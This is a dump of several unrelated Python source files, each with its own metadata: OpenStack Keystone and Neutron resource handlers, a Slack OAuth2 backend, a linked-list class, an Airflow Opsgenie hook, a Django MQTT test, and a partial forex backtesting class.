self.get_port_id(resource.port)\n        ctx.set(\"port_id\", port_id)\n        fip = self.get_floating_ip(port_id)\n        ctx.set(\"fip\", fip)\n\n        if fip is None:\n            raise ResourcePurged()\n\n        resource.purged = False\n\n    def _find_available_fips(self, project_id, network_id):\n        available_fips = []\n        floating_ips = self._neutron.list_floatingips(floating_network_id=network_id, tenant_id=project_id)[\"floatingips\"]\n        for fip in floating_ips:\n            if fip[\"port_id\"] is None:\n                available_fips.append(fip)\n\n        return available_fips\n\n    def create_resource(self, ctx: handler.HandlerContext, resource: FloatingIP) -> None:\n        network = self.get_network(None, resource.external_network)\n        if network is None:\n            raise SkipResource(\"Unable to find external network\")\n        network_id = network[\"id\"]\n\n        project_id = self.get_project_id(resource, resource.project)\n        if project_id is None:\n            raise SkipResource(\"Cannot create a floating ip when project id is not yet known.\")\n        ctx.set(\"project_id\", project_id)\n\n        port_id = ctx.get(\"port_id\")\n\n        available_fips = self._find_available_fips(project_id, network_id)\n        if len(available_fips) > 0:\n            fip_id = available_fips[0][\"id\"]\n            self._neutron.update_floatingip(fip_id, {\"floatingip\": {\"port_id\": port_id, \"description\": resource.name}})\n\n        else:\n            self._neutron.create_floatingip({\"floatingip\": {\"port_id\": port_id, \"floating_network_id\": network_id,\n                                                            \"description\": resource.name}})\n\n        ctx.set_created()\n\n    def delete_resource(self, ctx: handler.HandlerContext, resource: FloatingIP) -> None:\n        self._neutron.delete_floatingip(ctx.get(\"fip\"))\n        ctx.set_purged()\n\n    def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: FloatingIP) -> None:\n        raise SkipResource(\"Updating a floating ip is not supported\")\n\n    @cache(timeout=5)\n    def facts(self, ctx, resource):\n        port_id = self.get_port_id(resource.port)\n        fip = self._neutron.list_floatingips(port_id=port_id)[\"floatingips\"]\n        if len(fip) == 0:\n            return {}\n\n        else:\n            return {\"ip_address\": fip[0][\"floating_ip_address\"]}\n\n\n@dependency_manager\ndef keystone_dependencies(config_model, 
resource_model):\n    projects = {}\n    users = {}\n    roles = []\n    for _, res in resource_model.items():\n        if res.id.entity_type == \"openstack::Project\":\n            projects[res.name] = res\n\n        elif res.id.entity_type == \"openstack::User\":\n            users[res.name] = res\n\n        elif res.id.entity_type == \"openstack::Role\":\n            roles.append(res)\n\n    for role in roles:\n        if role.project not in projects:\n            raise Exception(\"The project %s of role %s is not defined in the model.\" % (role.project, role.role_id))\n\n        if role.user not in users:\n            raise Exception(\"The user %s of role %s is not defined in the model.\" % (role.user, role.role_id))\n\n        role.requires.add(projects[role.project])\n        role.requires.add(users[role.user])\n\n\n@provider(\"openstack::Project\", name=\"openstack\")\nclass ProjectHandler(OpenStackHandler):\n    def read_resource(self, ctx, resource):\n        try:\n            project = self._keystone.projects.find(name=resource.name)\n            resource.purged = False\n            resource.enabled = project.enabled\n            resource.description = project.description\n            ctx.set(\"project\", project)\n        except NotFound:\n            raise ResourcePurged()\n\n    def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n        self._keystone.projects.create(resource.name, description=resource.description, enabled=resource.enabled,\n                                       domain=\"default\")\n        ctx.set_created()\n\n    def delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n        ctx.get(\"project\").delete()\n        ctx.set_purged()\n\n    def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n        ctx.get(\"project\").update(name=resource.name, description=resource.description, enabled=resource.enabled)\n        ctx.set_updated()\n\n    def facts(self, ctx, resource: Project):\n        try:\n            project = self._keystone.projects.find(name=resource.name)\n            return {\"id\": project.id, \"name\": project.name}\n        except Exception:\n            return {}\n\n\n@provider(\"openstack::User\", name=\"openstack\")\nclass UserHandler(OpenStackHandler):\n    def read_resource(self, ctx, resource):\n        try:\n            user = self._keystone.users.find(name=resource.name)\n            resource.purged = False\n            resource.enabled = user.enabled\n            resource.email = user.email\n            ctx.set(\"user\", user)\n\n            # if a password is provided (not \"\"), check if it works otherwise mark it as \"***\"\n            if resource.password != \"\":\n                try:\n                    s = keystone_client.Client(auth_url=resource.auth_url, username=resource.name, password=resource.password)\n                    s.authenticate()\n                except Exception:\n                    resource.password = \"***\"\n\n        except NotFound:\n            raise ResourcePurged()\n\n    def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n        self._keystone.users.create(resource.name, password=resource.password, email=resource.email, enabled=resource.enabled)\n        ctx.set_created()\n\n    def delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n        ctx.get(\"user\").delete()\n        ctx.set_purged()\n\n    def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n        user_id = ctx.get(\"user\").id\n        if resource.password != \"\":\n            self._keystone.users.update(user_id, password=resource.password, email=resource.email, enabled=resource.enabled)\n        else:\n            self._keystone.users.update(user_id, email=resource.email, enabled=resource.enabled)\n        ctx.set_updated()\n\n\n@provider(\"openstack::Role\", name=\"openstack\")\nclass RoleHandler(OpenStackHandler):\n    \"\"\"\n    creates roles and user, project, role assocations\n    \"\"\"\n    def read_resource(self, ctx, 
resource):\n        # get the role\n        role = None\n        try:\n            role = self._keystone.roles.find(name=resource.role)\n        except NotFound:\n            ctx.info(\"Role %(role)s does not exist yet.\", role=resource.role)\n\n        try:\n            user = self._keystone.users.find(name=resource.user)\n        except NotFound:\n            raise SkipResource(\"The user does not exist.\")\n\n        try:\n            project = self._keystone.projects.find(name=resource.project)\n        except NotFound:\n            raise SkipResource(\"The project does not exist.\")\n\n        try:\n            self._keystone.roles.check(role=role, user=user, project=project)\n            resource.purged = False\n        except Exception:\n            resource.purged = True\n\n        ctx.set(\"role\", role)\n        ctx.set(\"user\", user)\n        ctx.set(\"project\", project)\n\n    def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n        user = ctx.get(\"user\")\n        project = ctx.get(\"project\")\n        role = ctx.get(\"role\")\n\n        if role is None:\n            role = self._keystone.roles.create(resource.role)\n\n        self._keystone.roles.grant(user=user, role=role, project=project)\n        ctx.set_created()\n\n    def delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n        user = ctx.get(\"user\")\n        project = ctx.get(\"project\")\n        role = ctx.get(\"role\")\n\n        self._keystone.roles.revoke(user=user, role=role, project=project)\n        ctx.set_purged()\n\n    def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n        assert False, \"This should not happen\"\n\n\n@provider(\"openstack::Service\", name=\"openstack\")\nclass ServiceHandler(OpenStackHandler):\n    def read_resource(self, ctx, resource):\n        service = None\n        try:\n            service = self._keystone.services.find(name=resource.name, type=resource.type)\n            resource.description = service.description\n            resource.purged = False\n        except NotFound:\n            resource.purged = True\n            resource.description = None\n            resource.name = None\n            resource.type = None\n\n        ctx.set(\"service\", service)\n\n    def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n        self._keystone.services.create(resource.name, resource.type, description=resource.description)\n        ctx.set_created()\n\n    def delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n        ctx.get(\"service\").delete()\n        ctx.set_purged()\n\n    def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n        self._keystone.services.update(ctx.get(\"service\"), description=resource.description)\n        ctx.set_updated()\n\n\n@provider(\"openstack::EndPoint\", name=\"openstack\")\nclass EndpointHandler(OpenStackHandler):\n\n    types = {\"admin\": \"admin_url\", \"internal\": \"internal_url\", \"public\": \"public_url\"}\n\n    def read_resource(self, ctx, resource):\n        service = None\n        for s in self._keystone.services.list():\n            if resource.service_id == \"%s_%s\" % (s.type, s.name):\n                service = s\n\n        if service is None:\n            raise SkipResource(\"Unable to find service to which endpoint belongs\")\n\n        endpoints = {}\n        try:\n            endpoints = {e.interface: e for e in self._keystone.endpoints.list(region=resource.region, service=service)}\n            for k, v in EndpointHandler.types.items():\n                setattr(resource, v, endpoints[k].url if k in endpoints else None)\n\n            resource.purged = False\n        except NotFound:\n            resource.purged = True\n            resource.region = None\n            resource.internal_url = None\n            resource.admin_url = None\n            resource.public_url = None\n\n        ctx.set(\"service\", service)\n        ctx.set(\"endpoints\", endpoints)\n\n    def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n        assert False, \"Should 
never get here\"\n\n def delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n for endpoint in ctx.get(\"endpoints\"):\n endpoint.delete()\n\n ctx.set_purged()\n\n def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n service = ctx.get(\"service\")\n endpoints = ctx.get(\"endpoints\")\n\n for k, v in EndpointHandler.types.items():\n if k not in endpoints:\n self._keystone.endpoints.create(service, url=getattr(resource, v), region=resource.region, interface=k)\n ctx.set_created()\n\n elif v in changes:\n self._keystone.endpoints.update(endpoints[k], url=getattr(resource, v))\n ctx.set_updated()\n","sub_path":"plugins/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":72930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"190573182","text":"\"\"\"\nSlack OAuth2 backend, docs at:\n http://psa.matiasaguirre.net/docs/backends/slack.html\n https://api.slack.com/docs/oauth\n\"\"\"\nimport re\n\nfrom social.backends.oauth import BaseOAuth2\n\n\nclass SlackOAuth2(BaseOAuth2):\n \"\"\"Slack OAuth authentication backend\"\"\"\n name = 'slack'\n AUTHORIZATION_URL = 'https://slack.com/oauth/authorize'\n ACCESS_TOKEN_URL = 'https://slack.com/api/oauth.access'\n ACCESS_TOKEN_METHOD = 'POST'\n SCOPE_SEPARATOR = ','\n REDIRECT_STATE = True\n EXTRA_DATA = [\n ('id', 'id'),\n ('name', 'name'),\n ('real_name', 'real_name')\n ]\n\n def get_user_details(self, response):\n \"\"\"Return user details from Slack account\"\"\"\n # Build the username with the team $username@$team_url\n # Necessary to get unique names for all of slack\n match = re.search(r'//([^.]+)\\.slack\\.com', response['team_url'])\n username = '{0}@{1}'.format(response.get('name'), match.group(1))\n return {\n 'username': username,\n 'email': response['profile'].get('email', ''),\n 'fullname': response['profile'].get('real_name'),\n 'first_name': response['profile'].get('first_name'),\n 'last_name': response['profile'].get('last_name')\n }\n\n def user_data(self, access_token, *args, **kwargs):\n \"\"\"Loads user data from service\"\"\"\n # Has to be two calls, because the users.info requires a username,\n # And we want the team information\n # https://api.slack.com/methods/auth.test\n auth_test = self.get_json('https://slack.com/api/auth.test', params={\n 'token': access_token\n })\n\n # https://api.slack.com/methods/users.info\n data = self.get_json('https://slack.com/api/users.info', params={\n 'token': access_token,\n 'user': auth_test.get('user_id')\n })\n # Inject the team data\n out = data['user'].copy()\n out['team_id'] = auth_test.get('team_id')\n out['team'] = auth_test.get('team')\n out['team_url'] = auth_test.get('url')\n return out\n","sub_path":"social/backends/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"288432018","text":"class Node:\n def __init__(self, initdata):\n self.data = initdata\n self.next = None\n \n def getData(self):\n return self.data\n \n def getNext(self):\n return self.next\n \n def setData(self, data):\n self.data = data\n \n def setNext(self, next):\n self.next = next\n\nclass UnorderedList:\n def __init__(self):\n self.head = None\n \n def isEmpty(self):\n return self.head == None\n \n def add(self, item):\n temp = Node(item)\n temp.setNext(self.head)\n self.head = temp\n \n def length(self):\n current = self.head\n count = 0\n while 
current != None:\n            count = count + 1\n            current = current.getNext()\n        return count\n    \n    def search(self, item):\n        current = self.head\n        found = False\n        while current != None and not found:\n            if current.getData() == item:\n                found = True\n            else:\n                current = current.getNext()\n        return found\n    \n    def remove(self, item):\n        previous = None\n        current = self.head\n        remove = False\n        while current != None and not remove:\n            if current.getData() == item:\n                remove = True\n            else:\n                previous = current\n                current = current.getNext()\n        if remove:\n            if previous is None:\n                self.head = current.getNext()\n            else:\n                previous.setNext(current.getNext())\n        return remove\n    \n    def append(self, item):\n        current = self.head\n        if current is None:\n            self.head = Node(item)\n        else:\n            while current.getNext() != None:\n                current = current.getNext()\n            current.setNext(Node(item))\n    \n    def insert(self, index, item):\n        current = self.head\n        if current is None:\n            self.head = Node(item)\n        else:\n            listLength = self.length()\n            if index > listLength:\n                self.append(item)\n            elif index <= 1:\n                self.add(item)\n            else:\n                i = 1\n                while i < index - 1:\n                    current = current.getNext()\n                    i = i + 1\n                nextNode = current.getNext()\n                current.setNext(Node(item))\n                current.getNext().setNext(nextNode)\n    \n    def index(self, index):\n        current = self.head\n        listLength = self.length()\n        if index > listLength:\n            return None\n        else:\n            i = 1\n            while i < index:\n                current = current.getNext()\n                i = i + 1\n            return current.getData()\n    \n    def pop(self):\n        current = self.head\n        if current != None:\n            self.head = current.getNext()\n            return current.getData()\n\n    def showList(self):\n        current = self.head\n        while current != None:\n            print(current.getData())\n            current = current.getNext()\n\nulist = UnorderedList()\nulist.append(10)\nulist.append(12)\nulist.append(4)\nulist.append(11)\n\nulist.remove(4)\n\nulist.insert(6, 4)\nulist.showList()\nprint(ulist.index(3))\n","sub_path":"数据结构与算法/unorderedlist.py","file_name":"unorderedlist.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"109695944","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/contrib/hooks/opsgenie_alert_hook.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 3202 bytes\nimport json, requests\nfrom airflow.hooks.http_hook import HttpHook\nfrom airflow import AirflowException\n\nclass OpsgenieAlertHook(HttpHook):\n    \"\"\"OpsgenieAlertHook\"\"\"\n\n    def __init__(self, opsgenie_conn_id='opsgenie_default', *args, **kwargs):\n        super(OpsgenieAlertHook, self).__init__(*args, http_conn_id=opsgenie_conn_id, **kwargs)\n\n    def _get_api_key(self):\n        \"\"\"\n        Get Opsgenie api_key for creating alert\n        \"\"\"\n        conn = self.get_connection(self.http_conn_id)\n        api_key = conn.password\n        if not api_key:\n            raise AirflowException('Opsgenie API Key is required for this hook, please check your conn_id configuration.')\n        return api_key\n\n    def get_conn(self, headers=None):\n        \"\"\"\n        Overwrite HttpHook get_conn because this hook just needs base_url\n        and headers, and does not need generic params\n\n        :param headers: additional headers to be passed through as a dictionary\n        :type headers: dict\n        \"\"\"\n        conn = self.get_connection(self.http_conn_id)\n        self.base_url = conn.host if conn.host else 'https://api.opsgenie.com'\n        session = requests.Session()\n        if headers:\n            
session.headers.update(headers)\n        return session\n\n    def execute(self, payload=None):\n        \"\"\"\n        Execute the Opsgenie Alert call\n\n        :param payload: Opsgenie API Create Alert payload values\n            See https://docs.opsgenie.com/docs/alert-api#section-create-alert\n        :type payload: dict\n        \"\"\"\n        if payload is None:\n            payload = {}\n        api_key = self._get_api_key()\n        return self.run(endpoint='v2/alerts', data=json.dumps(payload),\n          headers={'Content-Type':'application/json', \n          'Authorization':'GenieKey %s' % api_key})","sub_path":"pycfiles/apache_ariatosca-0.2.0-py2-none-any/opsgenie_alert_hook.cpython-36.py","file_name":"opsgenie_alert_hook.cpython-36.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"450882184","text":"from django.test import TestCase\nfrom ..mqtt import getClient\nfrom django.utils.timezone import now\nfrom Sensor.models import Sensor, SensorData\nfrom Testutil.Setup import SetupEmbeddedNode, SetupSensor\nimport time\n\n\nclass testDataPipe(TestCase):\n\n    @classmethod\n    def setUpTestData(cls):\n        cls.MQTTClient = getClient()\n        cls.MQTTClient.loop_stop()\n        cls.MQTTClient.loop_start()\n\n    @classmethod\n    def tearDownClass(cls):\n        client = getClient()\n        client.loop_stop()\n\n    def setUp(self):\n        SetupEmbeddedNode()\n        SetupSensor()\n\n    def testSingleton(self):\n        \"\"\"\n        Verify that getClient() returns a singleton MQTT client object\n        :return:\n        \"\"\"\n        client = getClient()\n        self.assertEqual(client, self.MQTTClient)\n\n    def testMQttDataUpload(self):\n        \"\"\"\n        Test upstream publishing of sensor data\n        :return:\n        \"\"\"\n        sensorObj = Sensor.objects.all().first() # type:Sensor\n        payload = {\n            \"type\": \"sensor\",\n            \"UUID\": sensorObj.Node.UUID,\n            \"payload\": {\n                \"timestamp\": now().isoformat(),\n                \"value\": \"-1\",\n                \"sensorId\": sensorObj.SensorID\n            }\n        }\n\n        for i in range(0, 5):\n            # crude dict-to-JSON conversion; json.dumps(payload) would be more robust\n            self.MQTTClient.publish('testHome/data', payload=payload.__str__().replace(\"'\", '\"'))\n\n        time.sleep(0.5)\n\n        self.assertEqual(SensorData.objects.all().count(), 0)\n","sub_path":"src/DataPipe/TestUtil/testDatapipe.py","file_name":"testDatapipe.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"212810413","text":"# how to backtest:\n# how to provide data\n\nfrom Authenticate import Auth\nfrom find_signals import find_signal\nfrom order_execution import manage_position\nfrom utility_funcs import build_df\nfrom sklearn import preprocessing\nfrom sklearn.externals import joblib\nfrom keras.models import load_model\nimport oandapyV20.endpoints.instruments as instruments\nimport oandapyV20\nimport numpy as np\nimport argparse\nimport os\nimport logging\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nformatter = logging.Formatter('%(levelname)s - %(message)s')\ndef setup_logger(name, log_file, level=logging.INFO):\n\n    handler = logging.FileHandler(log_file) \n    handler.setFormatter(formatter)\n\n    logger = logging.getLogger(name)\n    logger.setLevel(level)\n    logger.addHandler(handler)\n\n    return logger\n\n# general process logger\nlogger = setup_logger('first_logger', 'back_test.log')\n\n# -----------------------------------------------------------------------------\n# class Test\n# store information for backtesting and provide related functions\n# class Test should be replaceable for Account and Trade\n# -----------------------------------------------------------------------------\nclass Test():\n\t\n\t# initialization and class variables\n\t# 
-------------------------------------------------------------------------\n\tdef __init__(self):\n\t\tself.account_ID, self.access_token = Auth()\n\t\tself.client = oandapyV20.API(access_token=self.access_token)\n\t\t\n\t\t# set of currency pairs we are interested in\n\t\tself.pair_list = ['EUR_USD', 'EUR_GBP', 'USD_CHF', 'GBP_USD', 'USD_JPY', \n\t\t\t\t\t\t'AUD_USD', 'USD_CAD', 'EUR_JPY', 'EUR_NZD', 'USD_HKD', 'EUR_SGD', \n\t\t\t\t\t\t'AUD_CAD', 'AUD_CHF', 'AUD_NZD', 'CAD_CHF', 'CAD_JPY', 'CHF_JPY', \n\t\t\t\t\t\t'EUR_AUD', 'EUR_CAD', 'EUR_CHF', 'GBP_HKD', 'GBP_JPY', 'USD_DKK',\n\t\t\t\t\t\t'USD_THB', 'EUR_CZK']\n\n\t\t# load ml models and scalers to make predictions\n\t\tself.H4_BR_model = load_model('H4_DNN_Breakout')\n\t\tself.H1_BR_model = load_model('H1_DNN_Breakout')\n\t\tself.H4_SELL_model = load_model('H4_SELL_OPT')\n\t\tself.H1_SELL_model = load_model('H1_SELL_OPT')\n\t\tself.H4_BR_scaler = joblib.load('H4_BR_scaler.save')\n\t\tself.H1_BR_scaler = joblib.load('H1_BR_scaler.save')\n\t\tself.H4_SELL_scaler = joblib.load('H4_SELL_scaler.save')\n\t\tself.H1_SELL_scaler = joblib.load('H1_SELL_scaler.save')\n\n\t\t# position and trade information\n\t\tself.open_positions = {} # keep track of open positions\n\t\tself.prediction = {}\n\t\tself.trades = {} # more specific to trade values\n\t\tself.stops = {} # stop price for given order ID\n\t\tself.waiting = {}\n\t\tself.ml_waiting = {}\n\t\tself.ml_data = {} # ml data for all orders, contains label if order ended in profit\n\t\tself.waiting_len = 0\n\t\tself.stopped = 0\n\t\tself.mv_stopped = 0\n\t\tself.obv_slope = np.array([])\n\n\t\tself.trade_count = 0 # the current number of trades open\n\t\tself.total_trades = 0 # the total number of trades made\n\t\tself.last_ID = 0\n\t\tself.max_trade_count = 15\n\t\tself.balance = 10000\n\t\tself.min_balance_reached = 10000\n\t\tself.low = 0\n\t\tself.losing_tades = {}\n\t\tself.worst_trade = {}\n\t\tself.worst_trade[0] = '', '', ''\n\t\t\n\t\t# find optimized leverage\n\t\tself.lev_range = {}\n\t\tself.lev_range[\"H4\"] = .04, .065\n\t\tself.lev_range[\"H1\"] = .03, .055\n\t\tself.avg_lev = 0\n\t\tself.lev_boost = 0.06\n\t\tself.margin = 10000\n\t\tself.realized_profit = 0\n\n\t\t# data information\n\t\tself.lookBack = 730\n\t\tself.data = {}\n\t\tself.begin = {}\n\t\tself.end = {}\n\t\tself.init_interval()\n\n\t\n\t# class methods\n\t# -------------------------------------------------------------------------\n\tdef init_interval(self):\n\t\tfor frame in [\"H1\", \"H4\", \"D\"]:\n\t\t\tself.begin[frame] = 0\n\t\t\tself.end[frame] = 60\n\n\t# change the way we get data in order to get more candles\n\t# use from/to notation\n\tdef api_data(self, frame):\n\t\tcount = 0\n\n\t\tif frame==\"H1\":\n\t\t\tcount = self.lookBack*24\n\t\telif frame==\"H4\":\n\t\t\tcount = self.lookBack*6\n\t\telif frame==\"D\":\n\t\t\tcount = self.lookBack\n\n\t\tparams = {\n\t \"count\": count, \n\t \"granularity\": frame}\n\n\t\tfor pair in self.pair_list:\n\t\t\tr = instruments.InstrumentsCandles(instrument=pair, params=params)\n\t\t\tself.client.request(r) # request data\n\n\t\t\ttime, vol, op, high, low, close = build_df(r)\n\t\t\tself.data[pair] = close, low, high, op, vol, time # hashtable with key=pair, val=candle data\n\n\tdef api_date_range_data(self, frame):\n\n\t\tTime = np.array([])\n\t\tVol = np.array([])\n\t\tOpin = np.array([])\n\t\tHigh = np.array([])\n\t\tLow = np.array([])\n\t\tClose = np.array([])\n\n\t\tprint(\"< retrieving data, this may take a minute\")\n\t\tfor pair in self.pair_list:\n\t\t\tyear 
= 2017\n\t\t\tmonth = -1\n\t\t\tdat = '01T00'\n\t\t\tfor date_range in range(0, 12):\n\n\t\t\t\tif month == 12: \n\t\t\t\t\tmonth = 2\n\t\t\t\t\tyear += 1\n\t\t\t\telif month == 11:\n\t\t\t\t\tmonth = 1\n\t\t\t\t\tyear += 1\n\t\t\t\telse: \n\t\t\t\t\tmonth += 2\n\n\t\t\t\tdate_begin = str(year)+'-'+str(month)+'-'+dat # our start date\n\n\t\t\t\tparams = {\n\t\t\t\t\t\"from\": date_begin,\n\t\t\t\t\t\"count\": 360,\n\t\t\t\t\t\"granularity\": frame}\n\n\t\t\t\tr = instruments.InstrumentsCandles(instrument=pair, params=params)\n\t\t\t\tself.client.request(r)\n\n\t\t\t\ttime, vol, op, high, low, close = build_df(r)\n\t\t\t\tTime = np.append(Time, time)\n\t\t\t\tVol = np.append(Vol, vol)\n\t\t\t\tOpin = np.append(Opin, op)\n\t\t\t\tHigh = np.append(High, high)\n\t\t\t\tLow = np.append(Low, low)\n\t\t\t\tClose = np.append(Close, close)\n\n\t\t\tself.data[pair] = Close, Low, High, Opin, Vol, Time\n\t\tprint(\"< complete\")\n\t\n\t# interacts with find_signals\n\tdef get_data(self, frame, pair):\n\t\tclose, low, high, op, vol, time = self.data[pair]\n\t\tif self.end[frame] >= len(vol)-1: #specific to D, need to change\n\t\t\tempty = np.array([])\n\t\t\treturn empty, empty, empty, empty, empty, empty\n\n\t\t# cant slice candles data\n\t\ttime_ = time[self.begin[frame]:self.end[frame]]\n\t\tvol_ = vol[self.begin[frame]:self.end[frame]]\n\t\topen_ = op[self.begin[frame]:self.end[frame]]\n\t\thigh_ = high[self.begin[frame]:self.end[frame]]\n\t\tlow_ = low[self.begin[frame]:self.end[frame]]\n\t\tclose_ = close[self.begin[frame]:self.end[frame]]\n\n\t\treturn time_, vol_, open_, high_, low_, close_\n\n\tdef update_data(self, frame):\n\t\tself.begin[frame] += 1\n\t\tself.end[frame] += 1\n\n\tdef set_age(self, ID, delta):\n\t\tpair, frame, rg, age = self.open_positions[ID]\n\n\t\tself.open_positions[ID] = pair, frame, rg, (age + delta)\n\n\t# intacts with manage_positions\n\t# return hashtable of open positions\n\tdef openPositions(self):\n\t\treturn self.open_positions\n\n\tdef possible_trade(self, pair, frame, prediction, rg, o_slope, p_slope, obv, cycle, lev):\n\t\twaiting_str = pair+\",\"+frame\n\t\tself.waiting[waiting_str] = [0, pair, frame, prediction, rg, lev]\n\t\tself.waiting_len += 1\n\n\tdef Waiting(self):\n\t\treturn self.waiting\n\n\t# interacts with find_signals\n\tdef getBalance(self):\n\t\treturn self.margin\n\n\t# interacts with find_signals\n\t# see if we already have the trade\n\tdef can_trade(self, Account, pair, frame):\n\t\ttrade_count = self.trade_count\n\t\tif trade_count >= self.max_trade_count:\n\t\t\treturn False\n\n\t\tpositions = self.openPositions()\n\t\tfor ID in positions:\n\t\t\topen_pair, open_frame, rg, age = positions[ID]\n\t\t\t\n\t\t\topen_pair = open_pair.strip()\n\t\t\topen_frame = open_frame.strip()\n\t\t\tpair = pair.strip()\n\t\t\tframe = frame.strip()\n\n\t\t\tif open_pair==pair and open_frame==frame:\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef end_waiting(self, w_str):\n\t\tdel self.waiting[w_str]\n\t\t#del self.ml_waiting[w_str]\n\n\t# set the buy price of pair: trades[ID] = currprice, units\n\t# set the stop price for pair: stops[pair] = stop_price\n\t# set open_positions[pair] = ID, frame: generate ID, last_ID+1\n\t# update balance\n\tdef stop_loss_trade(self, Account, units, pair, stop_price, frame, last_price, rg):\n\t\tID = self.last_ID + 1\n\t\tself.last_ID += 1\n\n\t\tself.trades[ID] = last_price, units\n\t\tself.open_positions[ID] = pair, frame, rg, 0\n\t\tself.prediction[ID] = 1\n\t\tself.stops[ID] = stop_price\n\t\tself.trade_count += 
1\n\t\tself.total_trades += 1\n\n\t\ttime, vol, op, high, low, close = self.get_data(frame, pair)\n\t\tif close[-1] != last_price:\n\t\t\tprint(close[-1], \" -- \", last_price)\n\t\t\tprint(\"ERROR\")\n\t\t\texit()\n\n\t\tprint(\"< BUY ORDER:------------------------------------------------\")\n\t\tprint(\"< trade placed at\", time[-1])\n\t\tprint(\"< pair:\", pair, \" -- frame:\", frame)\n\t\tprint(\"< order price:\", last_price)\n\t\tprint(\"< stop_price:\", stop_price)\n\t\tprint(\"------------------------------------------------------------\")\n\n\t\tself.margin = (self.balance - (units*last_price)/50)\n\n\t# manage all stop losses\n\tdef manage_stops(self):\n\t\tfor ID in list(self.open_positions):\n\t\t\tpair, frame, rg, age = self.open_positions[ID]\n\t\t\tstop_p = self.stops[ID]\n\t\t\tend_interval = self.end[frame]-1\n\t\t\tclose, low, high, op, vol, time = self.data[pair]\n\t\t\tcurr_p = close[end_interval]\n\n\t\t\tif curr_p <= stop_p:\n\t\t\t\tself.close_position(self, ID, curr_p)\n\t\t\t\tself.stopped += 1\n\n\t# interacts with manage_positions\n\t# add to realized profit by calling update profit\n\t# delete positions[pair], trades[pair], stops[pair]\n\tdef close_position(self, Account, ID, last_price):\n\t\t\n\t\tpair, frame, rg, age = self.open_positions[ID]\n\t\ttime, vol, op, high, low, close = self.get_data(frame, pair)\n\n\t\tif last_price != close[-1]:\n\t\t\tprint(\"ERROR---------------------------\")\n\n\t\tb_price, units = self.trades[ID]\n\t\tval1 = b_price*units\n\t\tval2 = last_price*units\n\n\t\tself.realized_profit += (val2-val1) # add to profit, could be negative\n\t\tself.trade_count -= 1\n\t\tself.balance += (val2-val1)\n\t\tself.margin = self.balance\n\t\tself.mv_stopped += 1\n\n\t\tif self.balance < self.min_balance_reached:\n\t\t\tself.min_balance_reached = self.balance\n\t\t\tself.low = self.total_trades\n\n\t\tif (val2-val1) < 0:\n\t\t\tself.losing_tades[ID] = time[-1], pair, frame\n\n\t\tprint(\"< CLOSE ORDER:----------------------------------------------\")\n\t\tprint(\"< order placed at\", time[-1])\n\t\tprint(\"< pair:\", pair, \" -- frame:\", frame)\n\t\tprint(\"< close price:\", last_price)\n\t\tprint(\"------------------------------------------------------------\")\n\n\t\tdel self.trades[ID]\n\t\tdel self.open_positions[ID]\n\t\tdel self.prediction[ID]\n\t\tdel self.stops[ID]\n\n\tdef init_write(self):\n\t\topen('sell_time.csv', 'w').close()\n\t\twith open('sell_time.csv', 'a') as f_writer:\n\t\t\t\n\t\t\tln = \"ID,rg,h,l,c1,c2,c3,supp,o_s,p_s,obv1,obv2,obv3,rsi1,rsi2,rsi3,natr,cyc,stF,stS,rsi,obv,natrF,alF, alS,fC\\n\"\n\t\t\tf_writer.write(ln)\n\t\t\tf_writer.close()\n\t\n\tdef write_data(self, ID, data):\n\t\twith open('sell_time.csv', 'a') as f_writer:\n\t\t\t\n\t\t\tln = str(ID) + \",\"\n\t\t\tfor item in data:\n\t\t\t\tif item == data[-1]:\n\t\t\t\t\tln += str(item) + \"\\n\"\n\t\t\t\telse:\n\t\t\t\t\tln += str(item) + \",\"\n\n\t\t\tf_writer.write(ln)\n\t\t\tf_writer.close()\n\n\t# print account summary\n\tdef account_summary(self):\n\t\tprint(\"\\nTotal trades:\", self.total_trades)\n\t\tprint(\"Realized profit:\", self.realized_profit)\n\t\tprint(\"Account value:\", self.balance)\n\t\tif self.total_trades == 0:\n\t\t\tprint(\"Trade num to profit ratio: 0\")\n\t\telse:\n\t\t\tprint(\"Trade num to profit ratio:\", self.realized_profit/self.total_trades)\n\t\tprint(\"Return %:\", (self.realized_profit/10000)*100)\n\t\t\n\t\tprint(\"Open positions:\", self.trade_count)\n\t\tpos_val = 0\n\t\tfor ID in 
